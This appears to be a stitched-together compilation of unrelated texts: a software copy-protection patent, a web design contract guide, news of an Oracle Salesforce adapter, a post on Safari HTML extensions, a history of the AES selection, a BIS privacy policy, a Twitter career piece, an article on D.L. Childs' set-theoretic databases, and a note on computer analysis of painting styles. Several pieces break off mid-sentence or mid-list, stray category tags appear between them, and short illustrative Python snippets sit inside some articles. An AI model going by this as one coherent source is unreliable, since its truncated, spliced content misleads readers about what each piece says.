In a method of and apparatus for limiting program execution to only an authorized data processing system, a proprietary program, together with first and second authorization codes, is stored on a magnetic disc or other storage medium. The first and second authorization codes are read. A hardware module containing a pseudorandom number generator unique to the authorized system receives the first authorization code as a key. The resultant number generated by the number generator, which is a function of the key and particular pseudorandom generator algorithm, is compared with the second authorization code in direct or encrypted form. An execution enable signal is generated in response to a positive comparison to enable the stored program to be executed.
1. A software protection apparatus using first and second authorization codes and a pseudorandom number, said software protection apparatus for use with a computer, comprising:
an external memory device having computer software and a first authorization code and a second authorization code at selected data locations, wherein said second authorization code is part of a pseudorandom sequence;
means for reading said external memory device, said reading means located in the computer;
pseudorandom number generator device located in the computer and coupled to said reading means, for generating a pseudorandom number in response to said reading means reading said first authorization code from said external memory device, said first authorization code being read prior to execution of said computer software, said pseudorandom number generator device including a sealed casing, thereby preventing identification of the pseudorandom number generator algorithm;
processing means located in the computer and coupled to said reading means and said pseudorandom number generator device, for comparing the pseudorandom number generated by said pseudorandom number generator device with the second authorization code read from selected data locations in said external memory device, said processing means generating an enable signal in response to a positive comparison of the pseudorandom number with the second authorization code for enabling execution of the computer software stored in said external memory device.
The present invention relates generally to software protection, and more particularly toward a method of and apparatus for enabling execution of software with only a data processing system authorized to execute the software. The software protection method and apparatus are particularly useful in a microprocessor based environment.
Software piracy is rapidly becoming a major problem in data processing and particularly in the personal computer field. Software development for microcomputers, for example, is expensive and time consuming. It is therefore important to the software developer that each authorized user pay for the programs used and not reproduce the programs to be used by others or at other sites. Software piracy is, in practice, difficult to prevent because it is generally easy for users to make multiple copies of the programs for unauthorized users, and easy for competitors to repackage and distribute valuable programs at a fraction of the cost to the original developer. The problem is aggravated by the existence of microcomputers which are becoming widespread.
A number of different types of encryption methods have been provided to attempt to eliminate software piracy. One method involves providing a ROM containing an identification number that is duplicated on a floppy disc containing a program to be executed. The program periodically checks for the presence of the identification ROM. If the identification ROM is not connected in the system during execution of the program, the program crashes.
In a related method, a hardware module or "black box" is connected in a personal computer. Each piece of software is supplied with a magnetic key that physically plugs into the module and contains a coded identification number that matches the identification number on the software. To decode the stored program, the key must be plugged into the module.
In another method, a ROM produces a sequence of executable codes in the normal manner but prohibits the user from randomly accessing the memory addresses. A secret executive routine, built into the ROM, contains a table of the legal next steps for every given step in the program. Only those steps listed in the table can be accessed by the user. Thus, if a program contains a branch to one of two places, only those two places can be examined by the programmer at that time. If a program contains enough branches, it will be virtually impossible for the user to run through every permutation of the program to obtain a complete listing of the code.
Another prior art encryption method is monoalphabetic substitution, wherein each byte of a program is replaced with a substitute byte. Each byte of the enciphered program is deciphered when needed by simple table look-up using a small substitution table that is part of the circuitry on the microprocessor chip.
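A minimal sketch of that substitution scheme follows; the table here is randomly generated for illustration, whereas a real chip would hold a fixed secret table in its circuitry.

```python
import random

rng = random.Random(42)
encrypt_table = bytes(rng.sample(range(256), 256))  # secret one-byte substitution table
decrypt_table = bytes(encrypt_table.index(v) for v in range(256))  # its inverse

def encipher(program: bytes) -> bytes:
    return bytes(encrypt_table[b] for b in program)

def decipher(enciphered: bytes) -> bytes:
    return bytes(decrypt_table[b] for b in enciphered)

code = bytes([0x90, 0x90, 0xC3])         # arbitrary example program bytes
assert decipher(encipher(code)) == code  # each byte recovered by table look-up
```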
In some methods, the format of the data on the storage disc is altered by changing data locations. This makes it impossible, however, for authorized users to make backup copies.
All of the software protection systems of which I am aware are either not sufficiently secure against cryptanalyst attack, require too much space on the microprocessor chip or are too slow. Further, hardware based systems for software protection of which I am aware require a separate hardware module for each software package that, of course, substantially increases costs and
8/26/2009 05:45 PM | Commentary
Web Design Contracts 101: Don't Get Snookered
You know your company needs help with its Web site, but how do you sign a Web design contract that will ensure you get what you need at a fair price? These tips can help!
Resource Nation provides how-to purchasing guides, tips for selecting business service providers, and a free quote-comparison service that allows business owners to compare price and service offerings in over 100 categories from Web site hosting to graphic design. Setting up an engaging online presence for your business is just about a given these days, right? Well, maybe not. According to a Nielsen Online study earlier this year, almost half of small businesses don't even have a Web site. What's worse, the vast majority of those that do have a Web site spend a mere three hours a week marketing it, spending less than 10% of their marketing dollars on Internet-based efforts. There's already plenty of great information out there to convince you why your company needs a well-designed Web site, but not every small business knows how to get there. Assuming you're going to hire a Web designer to create your site, how do you figure out what should be in the contract to make sure you get what you need at a fair price?
Law school courses break down contracts into three parts: Offer, Acceptance, and Consideration. For practical purposes, this means that a contract can take many forms. Approving a written e-commerce Web design proposal, making payments on invoices for design work, and other actions can all constitute binding agreements -- agreements whose terms might not be entirely in your favor. When it comes to Web design, it's important to have a formally drawn up, written agreement that outlines the basic responsibilities of both parties. The contract itself doesn't need to go into design specifics ("logo to contain pantone color X")-- in fact, many Web designers use service level agreements (SLAs) to describe the details of the design work. While it can be helpful to have an attorney draft this document, most designers have standard forms that they modify for each individual project. Here's an outline of what should be addressed in a typical Web design contract:
Statement of Work The Statement of Work (SOW) is a broad outline of the project scope, or a roadmap for the project. Since planning out the project can be a job in itself, many designers charge clients to prepare an SOW -- some call it a consulting fee or a project proposal. That's not unreasonable. Whether free or paid, the scope of work or work description should include
Number of pages and/or page templates to be created
Number of programs or scripts (for browser compatibility)
Integration of other programs/applications (form set up, social media integrations)
Amount of written content
Ongoing work (hosting, maintenance)
Some designers also include graphic design time, browser compatibility efforts, and the time it takes to train the client how to update the site themselves (for example, changing product information on an e-commerce site) in the scope of work. The statement of work should describe the project, not the site itself.
Timeline
A project timeline is a key component of any Web design contract. Web design is a very collaborative process -- from a designer's point of view, the provider is never fully in control of the timeline because the client has to approve elements like layout, content, and other design work before the project can move forward. The contract should include "benchmarks" for the completion of certain items, and a specified duration for ongoing services like Web hosting (if it's provided by the designer). With your launch date in mind, you can work backwards with the designer to identify the dates when each element of the job should be completed. Be prepared for the designer to hold you to this timeline and charge more if approval deadlines are not met.
Definitions
The way a contract is worded is very important. Avoid ambiguity at all costs -- if your contract has an upcharge for "major revisions" to the design plan, it should also define the differences between a "major revision" and a "minor revision." "Design elements," "design changes," and other terms can be pretty ambiguous, which can lead to misunderstandings and even legal action down the road if the designer/client relationship goes sour. You should never assume the meaning of an industry term that appears several times in a contract. If you're not absolutely sure what it means, get the definition included in the agreement.
Offer, Acceptance, and Consideration - Always Important
Great article. It's always important to do business with firms you can trust. There are a lot of companies out there that offer website design services, however, finding one you want to do business with can often be a tall task. I always recommend trying to avoid lengthy contracts and beware of any jargon regarding minimum commitments.
My company, Home Instead Home Care in Laconia NH, has transitioned to having all of our website design done in-house by our parent company, so that has helped alleviate some of the issues we've had in the past.
Oracle builds a bridge to Salesforce.com with new adapter
The adapter allows organizations to synchronize Salesforce.com and on-premises applications
Joab Jackson (IDG News Service) on 17 January, 2014 18:03
The Oracle Cloud Adapter for Salesforce provides a way of moving between Salesforce.com and Oracle applications
Kicking off an initiative to better bridge cloud services with its own software, Oracle has released an adapter that allows organizations to copy data between their Salesforce.com accounts and Oracle software.
"We're encapsulating standard Web services calls into easier-to-use adapters," said Demed L'Her, Oracle vice president of product management.
The Oracle Cloud Adapter for Salesforce is an extension of the Oracle SOA Suite, Oracle's software for integrating enterprise applications through the use of Web services standards.
It will be the first in a number of connectors that the company plans to offer that connect cloud services with on-premises Oracle applications, L'Her said. The company already offers over 300 adapters for connecting different Oracle and non-Oracle enterprise software packages and now the company will extend this catalog to include adapters for cloud services.
Although Oracle and Salesforce.com are fierce competitors in the enterprise software market, the two companies agreed to a partnership last June to facilitate greater interoperability between both company's products and services.
The adapter is not the result of that partnership, however, but rather part of Oracle's ongoing efforts to help its customers integrate Oracle software with third-party products and services, L'Her said.
When an organization needs to copy and synchronize data between a Salesforce.com service and an on-premises application, an administrator or developer sets up a connection between the two. Salesforce.com offers access for third-party applications through a number of different APIs (application programming interfaces), including SOAP (Simple Object Access Protocol), a Web services protocol used for exchanging information over a network.
While Web services provide the protocols for different enterprise applications to interact with one another, they still require a fair amount of manual configuration, which can be time-consuming and difficult to execute correctly.
"Web services do solve the interoperability problems, but they do not make everything consistent. So you still need to piece a lot of things together," L'Her said.
Another issue is that each enterprise software vendor or cloud service provider implements Web services calls in a slightly different way, L'Her said.
"Typically, in order to connect to Salesforce.com, you need to authenticate, then pass a token for authorization, and then perhaps use a SOAP call. And all that will be different when you move to RightNow, and it will be different when you move to NetSuite," L'Her said.
The Salesforce adapter provides a way to establish a connection to Salesforce.com using a point-and-click GUI, which will also be used for future cloud adapters, standardizing the process of establishing new connections between on-premises software and cloud services.
Once the adapter is installed, an administrator can see all the business objects within their Salesforce.com accounts and route any changes within these objects to any other application connected to the SOA Suite.
One common-use case for the adapter, for instance, would be to synchronize customer data from two different business units within an organization, one using Salesforce.com and the other using the Oracle E-Business Suite. Perhaps both units deal with many of the same customers and the company needs to establish a master record for each customer.
Oracle expects that the majority of data exchanges using the adapter will be in real-time, although batch mode processing is also an option. The adapter detects when a change in a database is made in one of the applications and replicates that change to the other application. The Oracle Credential Store Framework manages user account credentials, so sensitive passwords don't need to be sent across the network.
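The detect-and-replicate pattern described here can be sketched generically. The Store class, the record layout, and the timing below are hypothetical stand-ins for the two connected applications, not Oracle's implementation.

```python
import time

class Store:
    """Hypothetical stand-in for a Salesforce.com org or an on-premises schema."""
    def __init__(self, rows=None):
        self.rows = rows or {}          # record id -> (payload, modified_at)

    def changed_since(self, ts):
        return {k: v for k, v in self.rows.items() if v[1] > ts}

    def upsert(self, key, value):
        self.rows[key] = value

def replicate(source, target, last_sync):
    # Detect changes made since the last pass and copy them across.
    for key, value in source.changed_since(last_sync).items():
        target.upsert(key, value)
    return time.time()

source = Store({"acct-1": ({"name": "Acme"}, time.time())})
target = Store()
last_sync = replicate(source, target, 0.0)
# Real-time mode would run replicate() in a loop; batch mode runs it on a schedule.
```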
Oracle will release other adapters as it sees demand for them from customers. The company is now working on one for the Oracle RightNow CRM (customer relationship management) software.
Oracle will also release a software development kit to help organizations build their own cloud adapters.
Tags: Enterprise service busses, Salesforce.com, middleware, software, Enterprise application integration, cloud computing, internet, data integration, Infrastructure services, Oracle, Application servers
Search WaSP
safari extensions
By Anders Pearson | July 8th, 2004 | Filed in Browsers Skip to comment form
Dave Hyatt and the Safari team have been busy lately adding support for a number of extensions to html to be used by the upcoming Safari RSS reader and Dashboard. On the list is IE’s contenteditable, along with a slider widget, search fields, a composite attribute on the <img/> element, and a new <canvas/> element.
This has generated a fair amount of concern in the web developer community. Tim Bray and Eric Meyer both worry that this heralds a return to the bad old days of the browser wars with everyone just ignoring the standards and making things up for themselves. Specifically, they point out that instead of trying to put new elements into HTML, they could have used XHTML, which, being XML, is designed to be extensible with namespaces or at the very least used a different DOCTYPE. Dave has responded with an explanation of why they did things the way they did. Dave argues that the XML and namespaces approach has implementation issues. I’m not enough of an expert on browser internals to say whether this is a cop-out or not, so I guess we’ll have to trust him on that. He also says that:
“However, this would have dramatically increased the complexity of crafting Dashboard widgets. People know how to write HTML, but most of those same people have never written an XML file, and namespaces are a point of confusion.”
Would the increase in complexity in the markup really be that much of an obstacle? Dashboard widgets seem to me like the kind of thing that would be written by a programmer, or at least have an expectation of being a little more strict than a regular web-page. Besides, web developers have historically shown an incredible aptitude for blindly copy-pasting markup. There’s an awful lot of RDF out on the web. Somebody had to write it. He also doesn’t address the suggestion of at the very least creating their own DTD with their extensions and using a DOCTYPE that points at that DTD. This would go a long way towards alleviating the whole “polluting HTML” concern. I haven’t really seen any actual real-world examples of this markup in action, so for all I know they’ve already done this or are planning to.
While I can understand and respect the following:
“In other words, in an ideal world where we had two years to craft Dashboard, maybe we could have used XHTML and SVG, but we aren’t living in that ideal world. We can basically manage only one “huge” layout engine feature in a development cycle, and given our developer feedback the choice of HTML editing as the feature to focus on this cycle was clear. We would still love to implement SVG and XSLT and other great technologies in the future, but we simply can’t do everything at once.”
It does sound an awful lot like the “Our customers don’t care about standards support. They want fancy new features” excuse that we’ve been hearing from browser vendors for years and that the WaSP has been actively trying to debunk.
The fact that they’re actively working with other browser makers, with the WHAT WG, and seem to have intentions of eventually getting the extensions approved by the W3C is somewhat reassuring.
Overall, though, it's not that big a deal. Safari does an excellent (not perfect) job of supporting the various HTML, XHTML, and CSS specs as they're written and ultimately, that's what's most important. If developers don't want to use the extensions, they don't have to. The vision that the WaSP has been most adamant about is that developers should be able to build sites that conform to the published specs and have them Just Work™ in every browser. If browsers want to support additional proprietary extensions on top of that, they're free to do so and the rest of us are free to ignore them.
All of the entries posted in WaSP Buzz express the opinions of their individual authors. They do not necessarily reflect the plans or positions of the Web Standards Project as a group.
The Advanced Encryption Standard (AES), the symmetric block cipher ratified as a standard by National Institute of Standards and Technology of the United States (NIST), was chosen using a process lasting from 1997 to 2000 that was markedly more open and transparent than its predecessor, the aging Data Encryption Standard (DES). This process won praise from the open cryptographic community, and helped to increase confidence in the security of the winning algorithm from those who were suspicious of backdoors in the predecessor, DES.
A new standard was needed primarily because DES has a relatively small 56-bit key which was becoming vulnerable to brute force attacks. In addition, the DES was designed primarily for hardware and is relatively slow when implemented in software.[1] While Triple-DES avoids the problem of a small key size, it is very slow even in hardware; it is unsuitable for limited-resource platforms; and it may be affected by potential security issues connected with the (today comparatively small) block size of 64 bits.
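The scale of the key-size problem is easy to check with back-of-the-envelope arithmetic. The assumed search rate below is arbitrary and purely illustrative.

```python
# Exhaustive-search time for DES (56-bit) versus AES (128-bit) keys,
# assuming a hypothetical rate of one billion keys tested per second.
SECONDS_PER_YEAR = 3600 * 24 * 365
rate = 10 ** 9

for name, bits in (("DES", 56), ("AES-128", 128)):
    years = 2 ** bits / rate / SECONDS_PER_YEAR
    print(f"{name}: about {years:.2e} years in the worst case")
```

At that rate a 56-bit keyspace falls in a couple of years, while a 128-bit keyspace remains astronomically out of reach, which is why the larger key sizes were required.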
Start of the process
On January 2, 1997, NIST announced that they wished to choose a successor to DES to be known as AES. Like DES, this was to be "an unclassified, publicly disclosed encryption algorithm capable of protecting sensitive government information well into the next century."[2] However, rather than simply publishing a successor, NIST asked for input from interested parties on how the successor should be chosen. Interest from the open cryptographic community was immediately intense, and NIST received a great many submissions during the three month comment period.
The result of this feedback was a call for new algorithms on September 12, 1997.[3] The algorithms were all to be block ciphers, supporting a block size of 128 bits and key sizes of 128, 192, and 256 bits. Such ciphers were rare at the time of the announcement; the best known was probably Square.
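Those requirements, a 128-bit block with 128-, 192-, and 256-bit keys, are exactly what the eventual winner exposes in today's libraries. A minimal sketch using Python's third-party cryptography package:

```python
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

for key_bytes in (16, 24, 32):                 # the three required key sizes
    key = os.urandom(key_bytes)
    nonce = os.urandom(16)                     # one 128-bit block for CTR mode
    encryptor = Cipher(algorithms.AES(key), modes.CTR(nonce),
                       backend=default_backend()).encryptor()
    ciphertext = encryptor.update(b"sixteen byte blk") + encryptor.finalize()
    print(key_bytes * 8, ciphertext.hex())
```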
Rounds one and two
In the nine months that followed, fifteen different designs were created and submitted from several different countries. They were, in alphabetical order: CAST-256, CRYPTON, DEAL, DFC, E2, FROG, HPC, LOKI97, MAGENTA, MARS, RC6, Rijndael, SAFER+, Serpent, and Twofish.
In the ensuing debate, many advantages and disadvantages of the different candidates were investigated by cryptographers; they were assessed not only on security, but also on performance in a variety of settings (PCs of various architectures, smart cards, hardware implementations) and on their feasibility in limited environments (smart cards with very limited memory, low gate count implementations, FPGAs).
Some designs fell due to cryptanalysis that ranged from minor flaws to significant attacks, while others lost favour due to poor performance in various environments or through having little to offer over other candidates. NIST held two conferences to discuss the submissions (AES1, August 1998 and AES2, March 1999), and in August 1999 they announced [4] that they were narrowing the field from fifteen to five: MARS, RC6, Rijndael, Serpent, and Twofish. All five algorithms, commonly referred to as "AES finalists", were designed by cryptographers considered well-known and respected in the community. The AES2 conference votes were as follows:
Rijndael: 86 positive, 10 negative | 计算机 |
Encryption Links
Encryption Export Controls, 75 Fed. Reg. 36,482 (June 25, 2010)
Section 740.17 – Encryption Commodities, Software, and Technology (ENC)
Supplement No. 1 to Part 740 – Country Groups
Supplement No. 3 to Part 740 – License Exception ENC Favorable Treatment Countries
Section 742.15 – Encryption Items
Supplement No. 5 to Part 742 – Encryption Registration
Supplement No. 6 to Part 742 – Technical Questionnaire for Encryption Items
Supplement No. 8 to Part 742 – Self-Classification Report for Encryption Items
Supplement No. 2 to Part 748 – Unique Application and Submission Requirements
Supplement No. 1 to Part 774, Category 5, Part II – Information Security
BIS Privacy Policy Statement

The kinds of information BIS collects
Automatic Collections - BIS Web servers automatically collect the following information:
The IP address of the computer from which you visit our sites and, if available, the domain name assigned to that IP address;
The type of browser and operating system used to visit our Web sites;
The date and time of your visit;
The Internet address of the Web site from which you linked to our sites; and
The pages you visit.
In addition, when you use our search tool our affiliate, USA.gov, automatically collects information on the search terms you enter. No personally identifiable information is collected by USA.gov.
This information is collected to enable BIS to provide better service to our users. The information is used only for aggregate traffic data and not used to track individual users. For example, browser identification can help us improve the functionality and format of our Web site.
Submitted Information: BIS collects information you provide through e-mail and Web forms. We do not collect personally identifiable information (e.g., name, address, phone number, e-mail address) unless you provide it to us. In all cases, the information collected is used to respond to user inquiries or to provide services requested by our users. Any information you provide to us through one of our Web forms is removed from our Web servers within seconds thereby increasing the protection for this information.
Privacy Act System of Records: Some of the information submitted to BIS may be maintained and retrieved based upon personal identifiers (name, e-mail addresses, etc.). In instances where a Privacy Act System of Records exists, information regarding your rights under the Privacy Act is provided on the page where this information is collected.
Consent to Information Collection and Sharing: All the information users submit to BIS is done on a voluntary basis. When a user clicks the "Submit" button on any of the Web forms found on BIS's sites, they are indicating they are aware of the BIS Privacy Policy provisions and voluntarily consent to the conditions outlined therein.
How long the information is retained: We destroy the information we collect when the purpose for which it was provided has been fulfilled unless we are required to keep it longer by statute, policy, or both. For example, under BIS's records retention schedule, any information submitted to obtain an export license must be retained for seven years.
How the information is used: The information BIS collects is used for a variety of purposes (e.g., for export license applications, to respond to requests for information about our regulations and policies, and to fill orders for BIS forms). We make every effort to disclose clearly how information is used at the point where it is collected and allow our Web site user to determine whether they wish to provide the information.
Sharing with other Federal agencies: BIS may share information received from its Web sites with other Federal agencies as needed to effectively implement and enforce its export control and other authorities. For example, BIS shares export license application information with the Departments of State, Defense, and Energy as part of the interagency license review process.
In addition, if a breach of our IT security protections were to occur, the information collected by our servers and staff could be shared with appropriate law enforcement and homeland security officials.
The conditions under which the information may be made available to the public: Information we receive through our Web sites is disclosed to the public only pursuant to the laws and policies governing the dissemination of information. For example, BIS policy is to share information which is of general interest, such as frequently asked questions about our regulations, but only after removing personal or proprietary data. However, information submitted to BIS becomes an agency record and therefore might be subject to a Freedom of Information Act request.
How e-mail is handled: We use information you send us by e-mail only for the purpose for which it is submitted (e.g., to answer a question, to send information, or to process an export license application). In addition, if you do supply us with personally identifying information, it is only used to respond to your request (e.g., addressing a package to send you export control forms or booklets) or to provide a service you are requesting (e.g., e-mail notifications). Information we receive by e-mail is disclosed to the public only pursuant to the laws and policies governing the dissemination of information. However, information submitted to BIS becomes an agency record and therefore might be subject to a Freedom of Information Act request.
The use of "cookies": BIS does not use "persistent cookies" or tracking technology to track personally identifiable information about visitors to its Web sites.
Information Protection: Our sites have security measures in place to protect against the loss, misuse, or alteration of the information on our Web sites. We also provide Secure Socket Layer protection for user-submitted information to our Web servers via Web forms. In addition, staff is on-site and continually monitor our Web sites for possible security threats.
Links to Other Web Sites: Some of our Web pages contain links to Web sites outside of the Bureau of Industry and Security, including those of other federal agencies, state and local governments, and private organizations. Please be aware that when you follow a link to another site, you are then subject to the privacy policies of the new site.
Further Information: If you have specific questions about BIS' Web information collection and retention practices, please use the form provided.
Policy Updated: April 6th, 2015 10:00am | 计算机 |
Twitter: It’s Not Just About Lunch
Twitter awareness is growing by leaps and bounds
By William Arruda
August 2, 2009 06:44 PM EDT
A recent Sprint commercial about the “Now Network” noted that 26% of viewers had no idea what “twittering on Twitter” means. Yet, it’s clear that Twitter awareness is growing by leaps and bounds. Of course, this doesn’t mean opinions about Twitter are all positive.
Many still hold the view expressed in this Twouble with Twitters video. As well, as Steven Johnson stated in his favorable Time magazine piece, “The one thing you can say for certain about Twitter is that it makes a terrible first impression… It's not as if we were all… saying, ‘If only there were a technology that would allow me to send a message to my 50 friends, alerting them in real time about my choice of breakfast cereal.’" In fact, when I first started using Twitter, I wondered, to borrow words from Andy Warhol, if Twitter was not just a way to become more “deeply superficial.”
All that is changing.
Google “Twitter” and you’ll find more than six hundred million results – with more than 100 million of them pertaining to using Twitter in your career. Explore business use of Twitter and you’ll find this online social networking tool is rapidly being adapted by all kinds of businesses for marketing, promotion, and customer service. Finally, if that’s not enough, you may want to check out the forthcoming book by Shel Israel, Twitterville: How Businesses Can Thrive in the New Global Neighborhoods. If you want an early peek, read the introduction to Shel’s book at his blog; there, you’ll also find his Twitterville Notebook entries.
Frankly, while I’d recognized early the career value of Twitter, I had not been actively promoting it to people in career transition. Now, I do. Here are three reasons why:
Career/Business Intelligence: Twitter is a great way to find and follow companies to learn how they interact with others and what matters to them. You'll find that many people also post links to useful industry information published elsewhere on the web. More importantly, you can begin learning about and interacting with thought leaders in your industry.
Networking: Clearly, Twitter offers a way to interact with people. If they're not already there, you can invite people you know to connect and interact on Twitter. Even better, you can interact with anyone – either indirectly via a tweet using their Twitter name, or via Direct Message, if they follow you. And just as in life, in this “brave new world of digital intimacy,” the more you interact with others the better chance you have of building real relationships.
Professional Visibility and Credibility: While it's a good idea to use multiple approaches to establish your professional online identity, Twitter is a powerful addition to your suite of social media tools. In a real way, by posting your professional perspectives, exchanging views with others, and linking to helpful information (including your own blog posts), Twitter can be the backbone of your personal brand online.
So, if you're not yet on Twitter, learn the basics and set up an account. You can probably do it during lunch hour.
Cross-posted at Threshold Consulting.
Published August 2, 2009. Copyright © 2009 SYS-CON Media, Inc. — All Rights Reserved.
More Stories By William Arruda
Dubbed 'The Personal Branding Guru’ by Entrepreneur magazine, William Arruda is a pioneering brand strategist, speaker, author and founder of Reach Personal Branding. He is credited with turning the concept of personal branding into a global industry.
William delivers keynotes and workshops on the transformative power of personal branding for some of the world’s most successful companies. He energizes and motivates his audiences—and his private clients include some of the world’s most influential leaders. As a thought-leader, William is a sought-after spokesperson on personal branding, social media and leadership. He has appeared on BBC TV, the Discovery Channel and Fox News Live and he’s been featured in countless publications, including Time Magazine, the Wall Street Journal, Forbes and the New York Times. William is the coauthor of the bestselling book Career Distinction. He is a member of the International Coach Federation and the National Speakers Association. He holds a Master’s Degree in Education. | 计算机 |
Bio | Archive Ken North
David Childs authored pioneering research about implementing set operations that enabled a programmer to approach the data storage and retrieval problem from a logical model, rather than a physical model of the data.
A thorough examination of databases and data management will include many flavors of data and information models, including conceptual, logical, physical, mathematical, and application models. Database technology is constantly evolving, with new approaches and refinements to existing platforms. The choice of a data access solution depends in part on the underlying data model; whether a data store operates with sets, graphs or other types of data.Data management technology has undergone evolutionary development since the 1950s. The modern database management system (DBMS) represents mature, but not static, technology. Besides the emergence of new approaches to data persistence, there are continued refinements to mature DBMS platforms.
Today's data stores implement a variety of data models, including graphs, sets, collections, arrays, cubes and other variants, including the hierarchical data model, relational model, network data model (CODASYL), trees, nested sets, adjacency lists and object stores. The index sequential access method (ISAM), key-value data stores and record management systems have also been implemented in various forms for decades.
The concept of a data store that supported set operations such as union, intersection, domain and range emerged in the 1960s, based of course on Georg Cantor's set theory published in the 19th century. In 1968, D.L. Childs, then at the University of Michigan, wrote seminal papers about set-theoretic data structures that provided data independence, meaning an application did not have to know the physical structure of the data. During that era of first-generation databases (see CODASYL 1968 Survey of Data Base Systems), data access typically required the use of pointers and descriptions of physical data structures. Childs authored pioneering research about implementing set operations that enabled a programmer to approach the data storage and retrieval problem from a logical view, rather than a physical view of the data. His March 1968 paper, "Description of A Set-Theoretic Data Structure", explained that programmers can query data using set-theoretic expressions instead of navigating through fixed structures.
"A set-theoretic data structure (STDS) is virtually a 'floating' or pointer-free structure allowing quicker access, less storage, and greater flexibility than fixed or rigid structures that rely heavily on internal pointers or hash-coding, such as 'associative or relational structures,' 'list structures,' 'ring structures,' etc. An STDS relies on set-theoretic operations to do the work usually allocated to internal pointers. A question in an STDS will be a set-theoretic expression. Each set in an STDS is completely independent of every other set, allowing modification of any set without perturbation of the rest of the structure; while fixed structures resist creation, destruction, or changes in data. An STDS is essentially a meta-structure, allowing a question to 'dictate' the structure or data-flow. A question establishes which sets are to be accessed and which operations are to be performed within and between these sets. In an STDS there are as many 'structures' as there are combinations of set-theoretic operations; and the addition, deletion, or change of data has no effect on set-theoretic operations, hence no effect on the 'dictated structures.' Thus in a floating structure like an STDS the question directs the structure, instead of being subservient to it."
In August 1968, Childs published "Feasibility of a Set-Theoretic Data Structure. A General Structure Based on a Reconstituted Set-Theoretic Definition for Relations".
"This paper is motivated by an assumption that many problems dealing with arbitrarily related data can be expedited on a digital computer by a storage structure which allows rapid execution of operations within and between sets of datum names. In order for such a structure to be feasible, two problems must be considered: (1) the structure should be general enough that the sets involved may be unrestricted, thus allowing sets of sets of sets...; sets of ordered pairs, ordered triples...; sets of variable length n-tuples, n-tuples of arbitrary sets; etc.; (2) the set-operations should be general in nature, allowing any of the usual set theory operations between sets as described above, with the assurance that these operations will be executed rapidly. A sufficient condition for the latter is the existence of a well-ordering relation on the union of the participating sets. These problems are resolved in this paper with the introduction of the concept of a 'complex' which has an additional feature of allowing a natural extension of properties of binary relations to properties of general relations."
The Federal government, including the Defense Advanced Research Projects Agency (DARPA), frequently funded computer science research and development during that era. One such effort was the University of Michigan's Research in the Conversational Use of Computers (CONCOMP) project for which Childs did his work on set-theoretic data structures. During that era, DARPA also funded development of packet-switched network technology and the ARPAnet, the forerunner of today's Internet. Childs' CONCOMP papers were available only to 'qualified requesters' although Childs presented the August 1968 paper at that year's Congress of the International Federation for Information Processing (IFIP). Those 1968 papers did not receive the broad dissemination of research papers published today via the Internet. Nonetheless Dr. Edgar F. Codd, who'd gotten his PhD at the University of Michigan, cited Childs' paper on set-theoretic data structures in his June 1970 paper about the relational model.
Many persons who had not discovered Childs' papers erroneously believed the foundation of data independence and set-theoretic operations over data had been laid by Codd. Following Codd's 1970 paper on the relational model, other database researchers published papers that discussed the concept of data independence. In 1971, Chris Date and Paul Hopewell authored "Storage Structures and Physical Data Independence" for the ACM Workshop on Data Definition, Access and Control. The authors wrote about data independence being integral to the relational model:
"Such data independence was explicitly called out as one of the major objectives of the relational model by Ted Codd in 1970 in his famous paper "A Relational Model of Data for Large Shared Data Banks" (Communications of the ACM 13, No. 6, June 1970)."
Dr. Michael Stonebreaker's 1974 paper, "A Functional View of Data Independence", cited Codd's 1970 paper and Date's 1971 paper, but not Childs' papers in 1968. Similarly I've found other publications that credit the notion of data independence or physical data independence to Codd and Date, without referring to Childs' papers.
During the 1990s, the advent of object databases and object-oriented programming frequently surfaced topics related to the relational model and data independence in articles, conference presentations and online discussions. Prominent defenders of relational fidelity included Chris Date, David McGoveran, Hugh Darwen and Fabian Pascal. In debates about the relational model (then and now), data independence and relational algebra are often cited as key factors that differentiate Codd's relational model from less formal approaches. Relational algebra includes the group of set-theoretic operations that provide mathematical underpinnings to the relational model. With the emergence of the Internet, Childs' papers are now widely available to researchers. We now know Childs pioneered concepts of data independence and set-theoretic operations over data. The works of Georg Cantor and D.L. Childs provided groundwork that enabled Dr. Edgar F. Codd to develop the relational model. Several years ago I had an e-mail exchange about this with Don Chamberlin, the co-inventor of SQL who worked with the late Dr. Codd at IBM. He acknowledged Childs' contribution: "Thanks for the reminder of David Childs' work. As you have observed, modern relational databases owe a lot to Childs and he deserves recognition for this early and pioneering work."
Since his pioneering work on set-theoretic data structures, David Childs has published papers about extended set processing, XML processing and other subjects that will be a topic for the future.
Part 2: "Laying the Foundation" It will be interesting to watch whether set-store data access architectures become high fashion for processing large data sets.
Part 3: "Information Density, Mathematical Identity, Set Stores and Big Data" David Childs authored pioneering research about implementing set operations that enabled a programmer to approach the data storage and retrieval problem from a logical model, rather than a physical model of the data.
Release Date: March 18, 2013
Jane Tarakhovsky is the daughter of two artists, and it looked like she was leaving the art world behind when she decided to become a computer scientist. But her recent research project at Lawrence Technological University has demonstrated that computers can compete with art historians in critiquing painting styles.
While completing her master’s degree in computer science earlier this year, Tarakhovsky used a computer program developed by Assistant Professor Lior Shamir to demonstrate that a computer can find similarities in the styles of artists just as art critics and historian do.
In the experiment, published in the ACM Journal on Computing and Cultural Heritage and widely reported elsewhere, Tarakhovsky and Shamir used a complex computer algorithm to analyze approximately1,000 paintings of 34 well-known artists, and found similarities between them based solely on the visual content of the paintings. Surprisingly, the computer provided a network of similarities between painters that is largely in agreement with the perception of art historians.
For instance, the computer placed the High Renaissance artists Raphael, Da Vinci, and Michelangelo very close to each other. The Baroque painters Vermeer, Rubens and Rembrandt were placed in another cluster.
The experiment was performed by extracting 4,027 numerical image content descriptors – numbers that reflect the content of the image, such as texture, color, and shapes, in a quantitative fashion. The analysis reflected many aspects of the visual content and used pattern recognition and statistical methods to detect complex patterns of similarities and dissimilarities between the artistic styles. The computer then quantified these similarities.
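The pipeline the paper describes can be sketched in a few lines: reduce each painter to a numeric feature vector, then measure the distances between vectors and cluster them. The sketch below substitutes random numbers for the real descriptors, so only the mechanics, not the results, are meaningful.

```python
import numpy as np
from scipy.spatial.distance import pdist, squareform
from scipy.cluster.hierarchy import linkage

rng = np.random.default_rng(0)
painters = ["Raphael", "Da Vinci", "Michelangelo", "Vermeer", "Rembrandt"]
features = rng.random((len(painters), 4027))   # stand-in for 4,027 descriptors

condensed = pdist(features, metric="cosine")   # pairwise stylistic distances
print(squareform(condensed).round(3))          # similarity matrix
tree = linkage(condensed, method="average")    # hierarchical clustering;
# plotting this tree (e.g., with scipy's dendrogram) yields the network of
# similarities that was compared against art historians' groupings.
```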
